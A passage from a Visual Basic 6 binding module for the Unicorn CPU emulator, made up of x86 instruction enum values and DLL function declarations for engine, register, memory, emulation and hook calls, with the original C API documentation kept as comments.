= 975 ' UC_X86_INS_VPABSW = 976 ' UC_X86_INS_VPACKSSDW = 977 ' UC_X86_INS_VPACKSSWB = 978 ' UC_X86_INS_VPACKUSDW = 979 ' UC_X86_INS_VPACKUSWB = 980 ' UC_X86_INS_VPADDB = 981 ' UC_X86_INS_VPADDD = 982 ' UC_X86_INS_VPADDQ = 983 ' UC_X86_INS_VPADDSB = 984 ' UC_X86_INS_VPADDSW = 985 ' UC_X86_INS_VPADDUSB = 986 ' UC_X86_INS_VPADDUSW = 987 ' UC_X86_INS_VPADDW = 988 ' UC_X86_INS_VPALIGNR = 989 ' UC_X86_INS_VPANDD = 990 ' UC_X86_INS_VPANDND = 991 ' UC_X86_INS_VPANDNQ = 992 ' UC_X86_INS_VPANDN = 993 ' UC_X86_INS_VPANDQ = 994 ' UC_X86_INS_VPAND = 995 ' UC_X86_INS_VPAVGB = 996 ' UC_X86_INS_VPAVGW = 997 ' UC_X86_INS_VPBLENDD = 998 ' UC_X86_INS_VPBLENDMB = 999 ' UC_X86_INS_VPBLENDMD = 1000 ' UC_X86_INS_VPBLENDMQ = 1001 ' UC_X86_INS_VPBLENDMW = 1002 ' UC_X86_INS_VPBLENDVB = 1003 ' UC_X86_INS_VPBLENDW = 1004 ' UC_X86_INS_VPBROADCASTB = 1005 ' UC_X86_INS_VPBROADCASTD = 1006 ' UC_X86_INS_VPBROADCASTMB2Q = 1007 ' UC_X86_INS_VPBROADCASTMW2D = 1008 ' UC_X86_INS_VPBROADCASTQ = 1009 ' UC_X86_INS_VPBROADCASTW = 1010 ' UC_X86_INS_VPCLMULQDQ = 1011 ' UC_X86_INS_VPCMOV = 1012 ' UC_X86_INS_VPCMPB = 1013 ' UC_X86_INS_VPCMPD = 1014 ' UC_X86_INS_VPCMPEQB = 1015 ' UC_X86_INS_VPCMPEQD = 1016 ' UC_X86_INS_VPCMPEQQ = 1017 ' UC_X86_INS_VPCMPEQW = 1018 ' UC_X86_INS_VPCMPESTRI = 1019 ' UC_X86_INS_VPCMPESTRM = 1020 ' UC_X86_INS_VPCMPGTB = 1021 ' UC_X86_INS_VPCMPGTD = 1022 ' UC_X86_INS_VPCMPGTQ = 1023 ' UC_X86_INS_VPCMPGTW = 1024 ' UC_X86_INS_VPCMPISTRI = 1025 ' UC_X86_INS_VPCMPISTRM = 1026 ' UC_X86_INS_VPCMPQ = 1027 ' UC_X86_INS_VPCMPUB = 1028 ' UC_X86_INS_VPCMPUD = 1029 ' UC_X86_INS_VPCMPUQ = 1030 ' UC_X86_INS_VPCMPUW = 1031 ' UC_X86_INS_VPCMPW = 1032 ' UC_X86_INS_VPCOMB = 1033 ' UC_X86_INS_VPCOMD = 1034 ' UC_X86_INS_VPCOMPRESSD = 1035 ' UC_X86_INS_VPCOMPRESSQ = 1036 ' UC_X86_INS_VPCOMQ = 1037 ' UC_X86_INS_VPCOMUB = 1038 ' UC_X86_INS_VPCOMUD = 1039 ' UC_X86_INS_VPCOMUQ = 1040 ' UC_X86_INS_VPCOMUW = 1041 ' UC_X86_INS_VPCOMW = 1042 ' UC_X86_INS_VPCONFLICTD = 1043 ' UC_X86_INS_VPCONFLICTQ = 1044 ' UC_X86_INS_VPERM2F128 = 1045 ' UC_X86_INS_VPERM2I128 = 1046 ' UC_X86_INS_VPERMD = 1047 ' UC_X86_INS_VPERMI2D = 1048 ' UC_X86_INS_VPERMI2PD = 1049 ' UC_X86_INS_VPERMI2PS = 1050 ' UC_X86_INS_VPERMI2Q = 1051 ' UC_X86_INS_VPERMIL2PD = 1052 ' UC_X86_INS_VPERMIL2PS = 1053 ' UC_X86_INS_VPERMILPD = 1054 ' UC_X86_INS_VPERMILPS = 1055 ' UC_X86_INS_VPERMPD = 1056 ' UC_X86_INS_VPERMPS = 1057 ' UC_X86_INS_VPERMQ = 1058 ' UC_X86_INS_VPERMT2D = 1059 ' UC_X86_INS_VPERMT2PD = 1060 ' UC_X86_INS_VPERMT2PS = 1061 ' UC_X86_INS_VPERMT2Q = 1062 ' UC_X86_INS_VPEXPANDD = 1063 ' UC_X86_INS_VPEXPANDQ = 1064 ' UC_X86_INS_VPEXTRB = 1065 ' UC_X86_INS_VPEXTRD = 1066 ' UC_X86_INS_VPEXTRQ = 1067 ' UC_X86_INS_VPEXTRW = 1068 ' UC_X86_INS_VPGATHERDD = 1069 ' UC_X86_INS_VPGATHERDQ = 1070 ' UC_X86_INS_VPGATHERQD = 1071 ' UC_X86_INS_VPGATHERQQ = 1072 ' UC_X86_INS_VPHADDBD = 1073 ' UC_X86_INS_VPHADDBQ = 1074 ' UC_X86_INS_VPHADDBW = 1075 ' UC_X86_INS_VPHADDDQ = 1076 ' UC_X86_INS_VPHADDD = 1077 ' UC_X86_INS_VPHADDSW = 1078 ' UC_X86_INS_VPHADDUBD = 1079 ' UC_X86_INS_VPHADDUBQ = 1080 ' UC_X86_INS_VPHADDUBW = 1081 ' UC_X86_INS_VPHADDUDQ = 1082 ' UC_X86_INS_VPHADDUWD = 1083 ' UC_X86_INS_VPHADDUWQ = 1084 ' UC_X86_INS_VPHADDWD = 1085 ' UC_X86_INS_VPHADDWQ = 1086 ' UC_X86_INS_VPHADDW = 1087 ' UC_X86_INS_VPHMINPOSUW = 1088 ' UC_X86_INS_VPHSUBBW = 1089 ' UC_X86_INS_VPHSUBDQ = 1090 ' UC_X86_INS_VPHSUBD = 1091 ' UC_X86_INS_VPHSUBSW = 1092 ' UC_X86_INS_VPHSUBWD = 1093 ' UC_X86_INS_VPHSUBW = 1094 ' UC_X86_INS_VPINSRB = 1095 ' UC_X86_INS_VPINSRD = 1096 ' UC_X86_INS_VPINSRQ = 1097 ' UC_X86_INS_VPINSRW = 1098 ' UC_X86_INS_VPLZCNTD = 1099 ' UC_X86_INS_VPLZCNTQ = 1100 ' UC_X86_INS_VPMACSDD = 1101 ' UC_X86_INS_VPMACSDQH = 1102 ' UC_X86_INS_VPMACSDQL = 1103 ' UC_X86_INS_VPMACSSDD = 1104 ' UC_X86_INS_VPMACSSDQH = 1105 ' UC_X86_INS_VPMACSSDQL = 1106 ' UC_X86_INS_VPMACSSWD = 1107 ' UC_X86_INS_VPMACSSWW = 1108 ' UC_X86_INS_VPMACSWD = 1109 ' UC_X86_INS_VPMACSWW = 1110 ' UC_X86_INS_VPMADCSSWD = 1111 ' UC_X86_INS_VPMADCSWD = 1112 ' UC_X86_INS_VPMADDUBSW = 1113 ' UC_X86_INS_VPMADDWD = 1114 ' UC_X86_INS_VPMASKMOVD = 1115 ' UC_X86_INS_VPMASKMOVQ = 1116 ' UC_X86_INS_VPMAXSB = 1117 ' UC_X86_INS_VPMAXSD = 1118 ' UC_X86_INS_VPMAXSQ = 1119 ' UC_X86_INS_VPMAXSW = 1120 ' UC_X86_INS_VPMAXUB = 1121 ' UC_X86_INS_VPMAXUD = 1122 ' UC_X86_INS_VPMAXUQ = 1123 ' UC_X86_INS_VPMAXUW = 1124 ' UC_X86_INS_VPMINSB = 1125 ' UC_X86_INS_VPMINSD = 1126 ' UC_X86_INS_VPMINSQ = 1127 ' UC_X86_INS_VPMINSW = 1128 ' UC_X86_INS_VPMINUB = 1129 ' UC_X86_INS_VPMINUD = 1130 ' UC_X86_INS_VPMINUQ = 1131 ' UC_X86_INS_VPMINUW = 1132 ' UC_X86_INS_VPMOVDB = 1133 ' UC_X86_INS_VPMOVDW = 1134 ' UC_X86_INS_VPMOVM2B = 1135 ' UC_X86_INS_VPMOVM2D = 1136 ' UC_X86_INS_VPMOVM2Q = 1137 ' UC_X86_INS_VPMOVM2W = 1138 ' UC_X86_INS_VPMOVMSKB = 1139 ' UC_X86_INS_VPMOVQB = 1140 ' UC_X86_INS_VPMOVQD = 1141 ' UC_X86_INS_VPMOVQW = 1142 ' UC_X86_INS_VPMOVSDB = 1143 ' UC_X86_INS_VPMOVSDW = 1144 ' UC_X86_INS_VPMOVSQB = 1145 ' UC_X86_INS_VPMOVSQD = 1146 ' UC_X86_INS_VPMOVSQW = 1147 ' UC_X86_INS_VPMOVSXBD = 1148 ' UC_X86_INS_VPMOVSXBQ = 1149 ' UC_X86_INS_VPMOVSXBW = 1150 ' UC_X86_INS_VPMOVSXDQ = 1151 ' UC_X86_INS_VPMOVSXWD = 1152 ' UC_X86_INS_VPMOVSXWQ = 1153 ' UC_X86_INS_VPMOVUSDB = 1154 ' UC_X86_INS_VPMOVUSDW = 1155 ' UC_X86_INS_VPMOVUSQB = 1156 ' UC_X86_INS_VPMOVUSQD = 1157 ' UC_X86_INS_VPMOVUSQW = 1158 ' UC_X86_INS_VPMOVZXBD = 1159 ' UC_X86_INS_VPMOVZXBQ = 1160 ' UC_X86_INS_VPMOVZXBW = 1161 ' UC_X86_INS_VPMOVZXDQ = 1162 ' UC_X86_INS_VPMOVZXWD = 1163 ' UC_X86_INS_VPMOVZXWQ = 1164 ' UC_X86_INS_VPMULDQ = 1165 ' UC_X86_INS_VPMULHRSW = 1166 ' UC_X86_INS_VPMULHUW = 1167 ' UC_X86_INS_VPMULHW = 1168 ' UC_X86_INS_VPMULLD = 1169 ' UC_X86_INS_VPMULLQ = 1170 ' UC_X86_INS_VPMULLW = 1171 ' UC_X86_INS_VPMULUDQ = 1172 ' UC_X86_INS_VPORD = 1173 ' UC_X86_INS_VPORQ = 1174 ' UC_X86_INS_VPOR = 1175 ' UC_X86_INS_VPPERM = 1176 ' UC_X86_INS_VPROTB = 1177 ' UC_X86_INS_VPROTD = 1178 ' UC_X86_INS_VPROTQ = 1179 ' UC_X86_INS_VPROTW = 1180 ' UC_X86_INS_VPSADBW = 1181 ' UC_X86_INS_VPSCATTERDD = 1182 ' UC_X86_INS_VPSCATTERDQ = 1183 ' UC_X86_INS_VPSCATTERQD = 1184 ' UC_X86_INS_VPSCATTERQQ = 1185 ' UC_X86_INS_VPSHAB = 1186 ' UC_X86_INS_VPSHAD = 1187 ' UC_X86_INS_VPSHAQ = 1188 ' UC_X86_INS_VPSHAW = 1189 ' UC_X86_INS_VPSHLB = 1190 ' UC_X86_INS_VPSHLD = 1191 ' UC_X86_INS_VPSHLQ = 1192 ' UC_X86_INS_VPSHLW = 1193 ' UC_X86_INS_VPSHUFB = 1194 ' UC_X86_INS_VPSHUFD = 1195 ' UC_X86_INS_VPSHUFHW = 1196 ' UC_X86_INS_VPSHUFLW = 1197 ' UC_X86_INS_VPSIGNB = 1198 ' UC_X86_INS_VPSIGND = 1199 ' UC_X86_INS_VPSIGNW = 1200 ' UC_X86_INS_VPSLLDQ = 1201 ' UC_X86_INS_VPSLLD = 1202 ' UC_X86_INS_VPSLLQ = 1203 ' UC_X86_INS_VPSLLVD = 1204 ' UC_X86_INS_VPSLLVQ = 1205 ' UC_X86_INS_VPSLLW = 1206 ' UC_X86_INS_VPSRAD = 1207 ' UC_X86_INS_VPSRAQ = 1208 ' UC_X86_INS_VPSRAVD = 1209 ' UC_X86_INS_VPSRAVQ = 1210 ' UC_X86_INS_VPSRAW = 1211 ' UC_X86_INS_VPSRLDQ = 1212 ' UC_X86_INS_VPSRLD = 1213 ' UC_X86_INS_VPSRLQ = 1214 ' UC_X86_INS_VPSRLVD = 1215 ' UC_X86_INS_VPSRLVQ = 1216 ' UC_X86_INS_VPSRLW = 1217 ' UC_X86_INS_VPSUBB = 1218 ' UC_X86_INS_VPSUBD = 1219 ' UC_X86_INS_VPSUBQ = 1220 ' UC_X86_INS_VPSUBSB = 1221 ' UC_X86_INS_VPSUBSW = 1222 ' UC_X86_INS_VPSUBUSB = 1223 ' UC_X86_INS_VPSUBUSW = 1224 ' UC_X86_INS_VPSUBW = 1225 ' UC_X86_INS_VPTESTMD = 1226 ' UC_X86_INS_VPTESTMQ = 1227 ' UC_X86_INS_VPTESTNMD = 1228 ' UC_X86_INS_VPTESTNMQ = 1229 ' UC_X86_INS_VPTEST = 1230 ' UC_X86_INS_VPUNPCKHBW = 1231 ' UC_X86_INS_VPUNPCKHDQ = 1232 ' UC_X86_INS_VPUNPCKHQDQ = 1233 ' UC_X86_INS_VPUNPCKHWD = 1234 ' UC_X86_INS_VPUNPCKLBW = 1235 ' UC_X86_INS_VPUNPCKLDQ = 1236 ' UC_X86_INS_VPUNPCKLQDQ = 1237 ' UC_X86_INS_VPUNPCKLWD = 1238 ' UC_X86_INS_VPXORD = 1239 ' UC_X86_INS_VPXORQ = 1240 ' UC_X86_INS_VPXOR = 1241 ' UC_X86_INS_VRCP14PD = 1242 ' UC_X86_INS_VRCP14PS = 1243 ' UC_X86_INS_VRCP14SD = 1244 ' UC_X86_INS_VRCP14SS = 1245 ' UC_X86_INS_VRCP28PD = 1246 ' UC_X86_INS_VRCP28PS = 1247 ' UC_X86_INS_VRCP28SD = 1248 ' UC_X86_INS_VRCP28SS = 1249 ' UC_X86_INS_VRCPPS = 1250 ' UC_X86_INS_VRCPSS = 1251 ' UC_X86_INS_VRNDSCALEPD = 1252 ' UC_X86_INS_VRNDSCALEPS = 1253 ' UC_X86_INS_VRNDSCALESD = 1254 ' UC_X86_INS_VRNDSCALESS = 1255 ' UC_X86_INS_VROUNDPD = 1256 ' UC_X86_INS_VROUNDPS = 1257 ' UC_X86_INS_VROUNDSD = 1258 ' UC_X86_INS_VROUNDSS = 1259 ' UC_X86_INS_VRSQRT14PD = 1260 ' UC_X86_INS_VRSQRT14PS = 1261 ' UC_X86_INS_VRSQRT14SD = 1262 ' UC_X86_INS_VRSQRT14SS = 1263 ' UC_X86_INS_VRSQRT28PD = 1264 ' UC_X86_INS_VRSQRT28PS = 1265 ' UC_X86_INS_VRSQRT28SD = 1266 ' UC_X86_INS_VRSQRT28SS = 1267 ' UC_X86_INS_VRSQRTPS = 1268 ' UC_X86_INS_VRSQRTSS = 1269 ' UC_X86_INS_VSCATTERDPD = 1270 ' UC_X86_INS_VSCATTERDPS = 1271 ' UC_X86_INS_VSCATTERPF0DPD = 1272 ' UC_X86_INS_VSCATTERPF0DPS = 1273 ' UC_X86_INS_VSCATTERPF0QPD = 1274 ' UC_X86_INS_VSCATTERPF0QPS = 1275 ' UC_X86_INS_VSCATTERPF1DPD = 1276 ' UC_X86_INS_VSCATTERPF1DPS = 1277 ' UC_X86_INS_VSCATTERPF1QPD = 1278 ' UC_X86_INS_VSCATTERPF1QPS = 1279 ' UC_X86_INS_VSCATTERQPD = 1280 ' UC_X86_INS_VSCATTERQPS = 1281 ' UC_X86_INS_VSHUFPD = 1282 ' UC_X86_INS_VSHUFPS = 1283 ' UC_X86_INS_VSQRTPD = 1284 ' UC_X86_INS_VSQRTPS = 1285 ' UC_X86_INS_VSQRTSD = 1286 ' UC_X86_INS_VSQRTSS = 1287 ' UC_X86_INS_VSTMXCSR = 1288 ' UC_X86_INS_VSUBPD = 1289 ' UC_X86_INS_VSUBPS = 1290 ' UC_X86_INS_VSUBSD = 1291 ' UC_X86_INS_VSUBSS = 1292 ' UC_X86_INS_VTESTPD = 1293 ' UC_X86_INS_VTESTPS = 1294 ' UC_X86_INS_VUNPCKHPD = 1295 ' UC_X86_INS_VUNPCKHPS = 1296 ' UC_X86_INS_VUNPCKLPD = 1297 ' UC_X86_INS_VUNPCKLPS = 1298 ' UC_X86_INS_VZEROALL = 1299 ' UC_X86_INS_VZEROUPPER = 1300 ' UC_X86_INS_WAIT = 1301 ' UC_X86_INS_WBINVD = 1302 ' UC_X86_INS_WRFSBASE = 1303 ' UC_X86_INS_WRGSBASE = 1304 ' UC_X86_INS_WRMSR = 1305 ' UC_X86_INS_XABORT = 1306 ' UC_X86_INS_XACQUIRE = 1307 ' UC_X86_INS_XBEGIN = 1308 ' UC_X86_INS_XCHG = 1309 ' UC_X86_INS_XCRYPTCBC = 1310 ' UC_X86_INS_XCRYPTCFB = 1311 ' UC_X86_INS_XCRYPTCTR = 1312 ' UC_X86_INS_XCRYPTECB = 1313 ' UC_X86_INS_XCRYPTOFB = 1314 ' UC_X86_INS_XEND = 1315 ' UC_X86_INS_XGETBV = 1316 ' UC_X86_INS_XLATB = 1317 ' UC_X86_INS_XRELEASE = 1318 ' UC_X86_INS_XRSTOR = 1319 ' UC_X86_INS_XRSTOR64 = 1320 ' UC_X86_INS_XRSTORS = 1321 ' UC_X86_INS_XRSTORS64 = 1322 ' UC_X86_INS_XSAVE = 1323 ' UC_X86_INS_XSAVE64 = 1324 ' UC_X86_INS_XSAVEC = 1325 ' UC_X86_INS_XSAVEC64 = 1326 ' UC_X86_INS_XSAVEOPT = 1327 ' UC_X86_INS_XSAVEOPT64 = 1328 ' UC_X86_INS_XSAVES = 1329 ' UC_X86_INS_XSAVES64 = 1330 ' UC_X86_INS_XSETBV = 1331 ' UC_X86_INS_XSHA1 = 1332 ' UC_X86_INS_XSHA256 = 1333 ' UC_X86_INS_XSTORE = 1334 ' UC_X86_INS_XTEST = 1335 ' UC_X86_INS_FDISI8087_NOP = 1336 ' UC_X86_INS_FENI8087_NOP = 1337 ' UC_X86_INS_ENDING = 1338 'End Enum '-- [x86 specific] --------------- '// Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. '// Borrow from SegmentCache in qemu/target-i386/cpu.h 'typedef struct uc_x86_mmr { ' uint16_t selector; /* not used by GDTR and IDTR */ ' uint64_t base; /* handle 32 or 64 bit CPUs */ ' uint32_t limit; ' uint32_t flags; /* not used by GDTR and IDTR */ '} uc_x86_mmr; ' '// Callback function for tracing SYSCALL/SYSENTER (for uc_hook_intr()) '// @user_data: user data passed to tracing APIs. 'typedef void (*uc_cb_insn_syscall_t)(struct uc_struct *uc, void *user_data); '-------------------------------- '// Hook type for all events of unmapped memory access '#define UC_HOOK_MEM_UNMAPPED (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + UC_HOOK_MEM_FETCH_UNMAPPED) '// Hook type for all events of illegal protected memory access '#define UC_HOOK_MEM_PROT (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) '// Hook type for all events of illegal read memory access '#define UC_HOOK_MEM_READ_INVALID (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) '// Hook type for all events of illegal write memory access '#define UC_HOOK_MEM_WRITE_INVALID (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) '// Hook type for all events of illegal fetch memory access '#define UC_HOOK_MEM_FETCH_INVALID (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) '// Hook type for all events of illegal memory access '#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) '// Hook type for all events of valid memory access '#define UC_HOOK_MEM_VALID (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) '/* ' Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) ' ' @address: address where the code is being executed ' @size: size of machine instruction(s) being executed, or 0 when size is unknown ' @user_data: user data passed to tracing APIs. '*/ 'typedef void (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); ' public sub code_hook(byval uc as long , byval address as currency, byval size as long, byval user_data as long) ' '/* ' Callback function for tracing interrupts (for uc_hook_intr()) ' ' @intno: interrupt number ' @user_data: user data passed to tracing APIs. '*/ 'typedef void (*uc_cb_hookintr_t)(uc_engine *uc, uint32_t intno, void *user_data); ' '/* ' Callback function for tracing IN instruction of X86 ' ' @port: port number ' @size: data size (1/2/4) to be read from this port ' @user_data: user data passed to tracing APIs. '*/ 'typedef uint32_t (*uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); ' '/* ' Callback function for OUT instruction of X86 ' ' @port: port number ' @size: data size (1/2/4) to be written to this port ' @value: data value to be written to this port '*/ 'typedef void (*uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); ' '/* ' Callback function for hooking memory (UC_MEM_READ, UC_MEM_WRITE & UC_MEM_FETCH) ' ' @type: this memory is being READ, or WRITE ' @address: address where the code is being executed ' @size: size of data being read or written ' @value: value of data being written to memory, or irrelevant if type = READ. ' @user_data: user data passed to tracing APIs '*/ 'typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, ' uint64_t address, int size, int64_t value, void *user_data); ' '/* ' Callback function for handling invalid memory access events (UC_MEM_*_UNMAPPED and ' UC_MEM_*PROT events) ' ' @type: this memory is being READ, or WRITE ' @address: address where the code is being executed ' @size: size of data being read or written ' @value: value of data being written to memory, or irrelevant if type = READ. ' @user_data: user data passed to tracing APIs ' ' @return: return true to continue, or false to stop program (due to invalid memory). '*/ 'typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, ' uint64_t address, int size, int64_t value, void *user_data); '/* ' Memory region mapped by uc_mem_map() and uc_mem_map_ptr() ' Retrieve the list of memory regions with uc_mem_regions() '*/ 'typedef struct uc_mem_region { ' uint64_t begin; // begin address of the region (inclusive) ' uint64_t end; // end address of the region (inclusive) ' uint32_t perms; // memory permissions of the region '} uc_mem_region; ' '// All type of queries for uc_query() API. 'typedef enum uc_query_type { ' // Dynamically query current hardware mode. ' UC_QUERY_MODE = 1, ' UC_QUERY_PAGE_SIZE, '} uc_query_type; Public Declare Function ucs_dynload Lib "ucvbshim.dll" (ByVal path As String) As Long '/* ' Return combined API version & major and minor version numbers. ' ' @major: major number of API version ' @minor: minor number of API version ' ' @return hexical number as (major << 8 | minor), which encodes both ' major & minor versions. ' NOTE: This returned value can be compared with version number made ' with macro UC_MAKE_VERSION ' ' For example, second API version would return 1 in @major, and 1 in @minor ' The return value would be 0x0101 ' ' NOTE: if you only care about returned value, but not major and minor values, ' set both @major & @minor arguments to NULL. '*/ 'UNICORN_EXPORT 'unsigned int uc_version(unsigned int *major, unsigned int *minor); Public Declare Function ucs_version Lib "ucvbshim.dll" (ByRef major As Long, ByRef minor As Long) As Long ' ' '/* ' Determine if the given architecture is supported by this library. ' ' @arch: architecture type (UC_ARCH_*) ' ' @return True if this library supports the given arch. '*/ 'UNICORN_EXPORT 'bool uc_arch_supported(uc_arch arch); Public Declare Function ucs_arch_supported Lib "ucvbshim.dll" (ByVal arch As uc_arch) As Long '/* ' Create new instance of unicorn engine. ' ' @arch: architecture type (UC_ARCH_*) ' @mode: hardware mode. This is combined of UC_MODE_* ' @uc: pointer to uc_engine, which will be updated at return time ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc); Public Declare Function ucs_open Lib "ucvbshim.dll" (ByVal arch As uc_arch, ByVal mode As uc_mode, ByRef hEngine As Long) As uc_err '/* ' Close UC instance: MUST do to release the handle when it is not used anymore. ' NOTE: this must be called only when there is no longer usage of Unicorn. ' The reason is the this API releases some cached memory, thus access to any ' Unicorn API after uc_close() might crash your application. ' After this, @uc is invalid, and nolonger usable. ' ' @uc: pointer to a handle returned by uc_open() ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_close(uc_engine *uc); Public Declare Function ucs_close Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err ' '/* ' Query internal status of engine. ' ' @uc: handle returned by uc_open() ' @type: query type. See uc_query_type ' ' @result: save the internal status queried ' ' @return: error code of uc_err enum type (UC_ERR_*, see above) '*/ '// All type of queries for uc_query() API. 'typedef enum uc_query_type { ' // Dynamically query current hardware mode. ' UC_QUERY_MODE = 1, ' UC_QUERY_PAGE_SIZE, '} uc_query_type; 'UNICORN_EXPORT 'uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result); '/* ' Report the last error number when some API function fail. ' Like glibc's errno, uc_errno might not retain its old value once accessed. ' ' @uc: handle returned by uc_open() ' ' @return: error code of uc_err enum type (UC_ERR_*, see above) '*/ 'UNICORN_EXPORT 'uc_err uc_errno(uc_engine *uc); Public Declare Function ucs_errno Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err ' '/* ' Return a string describing given error code. ' ' @code: error code (see UC_ERR_* above) ' ' @return: returns a pointer to a string that describes the error code ' passed in the argument @code ' */ 'UNICORN_EXPORT 'const char *uc_strerror(uc_err code); Public Declare Function ucs_strerror Lib "ucvbshim.dll" (ByVal code As uc_err) As Long '/* ' Write to register. ' ' @uc: handle returned by uc_open() ' @regid: register ID that is to be modified. ' @value: pointer to the value that will set to register @regid ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_reg_write(uc_engine *uc, int regid, const void *value); Public Declare Function ucs_reg_write Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal regid As uc_x86_reg, ByRef value As Long) As uc_err '/* ' Read register value. ' ' @uc: handle returned by uc_open() ' @regid: register ID that is to be retrieved. ' @value: pointer to a variable storing the register value. ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_reg_read(uc_engine *uc, int regid, void *value); Public Declare Function ucs_reg_read Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal regid As uc_x86_reg, ByRef value As Long) As uc_err '/* ' Write multiple register values. ' ' @uc: handle returned by uc_open() ' @rges: array of register IDs to store ' @value: pointer to array of register values ' @count: length of both *regs and *vals ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count); ' '/* ' Read multiple register values. ' ' @uc: handle returned by uc_open() ' @rges: array of register IDs to retrieve ' @value: pointer to array of values to hold registers ' @count: length of both *regs and *vals ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count); '/* ' Write to a range of bytes in memory. ' ' @uc: handle returned by uc_open() ' @address: starting memory address of bytes to set. ' @bytes: pointer to a variable containing data to be written to memory. ' @size: size of memory to write to. ' ' NOTE: @bytes must be big enough to contain @size bytes. ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size); Public Declare Function ucs_mem_write Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef b As Byte, ByVal size As Long) As uc_err '/* ' Read a range of bytes in memory. ' ' @uc: handle returned by uc_open() ' @address: starting memory address of bytes to get. ' @bytes: pointer to a variable containing data copied from memory. ' @size: size of memory to read. ' ' NOTE: @bytes must be big enough to contain @size bytes. ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size); Public Declare Function ucs_mem_read Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef b As Byte, ByVal size As Long) As uc_err '/* ' Emulate machine code in a specific duration of time. ' ' @uc: handle returned by uc_open() ' @begin: address where emulation starts ' @until: address where emulation stops (i.e when this address is hit) ' @timeout: duration to emulate the code (in microseconds). When this value is 0, ' we will emulate the code in infinite time, until the code is finished. ' @count: the number of instructions to be emulated. When this value is 0, ' we will emulate all the code available, until the code is finished. ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count); Public Declare Function ucs_emu_start Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal startAt As Currency, ByVal endAt As Currency, ByVal timeout As Currency, ByVal count As Long) As uc_err ' '/* ' Stop emulation (which was started by uc_emu_start() API. ' This is typically called from callback functions registered via tracing APIs. ' NOTE: for now, this will stop the execution only after the current block. ' ' @uc: handle returned by uc_open() ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_emu_stop(uc_engine *uc); Public Declare Function ucs_emu_stop Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err '/* ' Register callback for a hook event. ' The callback will be run when the hook event is hit. ' ' @uc: handle returned by uc_open() ' @hh: hook handle returned from this registration. To be used in uc_hook_del() API ' @type: hook type ' @callback: callback to be run when instruction is hit ' @user_data: user-defined data. This will be passed to callback function in its ' last argument @user_data ' @begin: start address of the area where the callback is effect (inclusive) ' @end: end address of the area where the callback is effect (inclusive) ' NOTE 1: the callback is called only if related address is in range [@begin, @end] ' NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered ' @...: variable arguments (depending on @type) ' NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT) ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err __stdcall ucs_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...) ' 'note vb6 does not support variable length arguments to api declares so UC_HOOK_INSN would require a seperate declare and stub 'also note that the callback is not used directly, it is proxied through a cdecl stub 'since the hook flags can be different combos, we pass in a catagory for simplicity in selecting which c callback to use..(bit sloppy but easy) Public Declare Function ucs_hook_add Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef hHook As Long, ByVal hType As uc_hook_type, ByVal callback As Long, ByVal user_data As Long, ByVal beginAt As Currency, ByVal endAt As Currency, ByVal catagory As Long, Optional ByVal inst_id As Long = 0) As uc_err '/* ' Unregister (remove) a hook callback. ' This API removes the 